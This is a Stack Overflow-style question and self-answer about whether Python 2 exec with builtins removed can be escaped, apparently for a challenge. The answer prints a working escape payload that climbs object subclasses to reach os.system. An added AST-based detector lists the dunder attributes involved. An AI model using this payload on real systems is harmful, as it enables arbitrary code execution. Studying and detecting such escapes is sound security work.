
If this is being executed and I have full control over the string's value, am I able to leverage a reverse shell, or am I able to read files?

exec("string", {'__builtins__': None})

I'm having issues with finding relevant documentation about what is not included in __builtins__. I've manually found that print('something') works.

I, myself, lack the knowledge to determine whether this is exploitable or not. I feel like something like this shouldn't be safe since, correct me if I'm wrong, all builtins are python functions (Not confident on this).

I thought it might also be relevant referencing that a global variable was given as the 3rd argument, i.e. exec("string", {'__builtins__': None}, global_var)

Note: This is for python2. Note: This is for a challenge. No grey/black hat stuff!

PinkDraconian

  • I think it depends a bit on what you mean by exploitable -- but the answer is probably "yes -- on some level this is unsafe". See https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html where it is demonstrated that a malicious user could effectively segfault your interpreter under these circumstances. – mgilson Dec 25 '19 at 22:25
  • Moreover, that's a segfault because the bytecode being run is `KABOOM`, but if someone can run any arbitrary bytecode they want, that's a lot of attack surface to use to find an arbitrary code execution mechanism. Just because an exploit isn't known yet doesn't mean it's wise to expose the surface. – Charles Duffy Dec 25 '19 at 22:31

1 Answer


This is not a safe practice. Code exec can happen in the following manner:

This example executes some shellcode by importing os. The following can be altered to gain access to all builtins.

# The string walks the type hierarchy that is still reachable without builtins:
# () -> tuple -> object -> every loaded subclass, then picks catch_warnings, whose
# instance keeps a reference to the warnings module and so to the real builtins.
s = "[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('shellcode')"
# The key must be '__builtins__' (as in the question); 'builtins' would not remove anything.
exec(s, {'__builtins__': None})

The articles mentioned in the comments on the main question provide all the resources I used to get to this conclusion. Thanks guys!

PinkDraconian
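As an added example (not part of the original question or answer), here is an AST-based check that flags the dunder attribute chain the answer's payload relies on before any exec happens; the watch list SUSPICIOUS_ATTRS is my own construction, and this is a detection heuristic that supports the answer's conclusion, not a sandbox that would make exec of untrusted code safe.

```python
import ast

# Constructed watch list: the attributes and lookups the escape chain above walks
# through to get from an empty tuple back to the real builtins dictionary.
SUSPICIOUS_ATTRS = {
    "__class__", "__base__", "__bases__", "__mro__", "__subclasses__",
    "__globals__", "__builtins__", "__import__", "_module",
}

# The payload from the answer above, kept here as the positive sample.
PAGE_PAYLOAD = (
    "[c for c in ().__class__.__base__.__subclasses__() "
    "if c.__name__ == 'catch_warnings'][0]()._module"
    ".__builtins__['__import__']('os').system('shellcode')"
)

# Constructed benign sample: arithmetic on names, no attribute walking.
BENIGN = "total = sum_of_items * 2\nprint(total)"


def find_suspicious_attrs(src):
    """Parse src and return every watch-listed attribute name or string
    subscript key it touches (unordered, duplicates kept). Raises
    SyntaxError on input that is not valid Python, which callers should
    treat as a rejection too."""
    tree = ast.parse(src)
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute) and node.attr in SUSPICIOUS_ATTRS:
            hits.append(node.attr)
        elif isinstance(node, ast.Subscript):
            key = node.slice
            # Python < 3.9 wraps the subscript expression in ast.Index.
            if isinstance(key, getattr(ast, "Index", ())):
                key = key.value
            if isinstance(key, ast.Constant) and key.value in SUSPICIOUS_ATTRS:
                hits.append(key.value)
    return hits


def is_escape_attempt(src):
    """True when the source reaches for the type hierarchy or builtins."""
    return bool(find_suspicious_attrs(src))


if __name__ == "__main__":
    print(sorted(set(find_suspicious_attrs(PAGE_PAYLOAD))))
    print(is_escape_attempt(BENIGN))
```

Because attribute names can also be assembled at runtime, a clean result from this check is not proof of safety; it only catches the straightforward form of the chain shown in the answer.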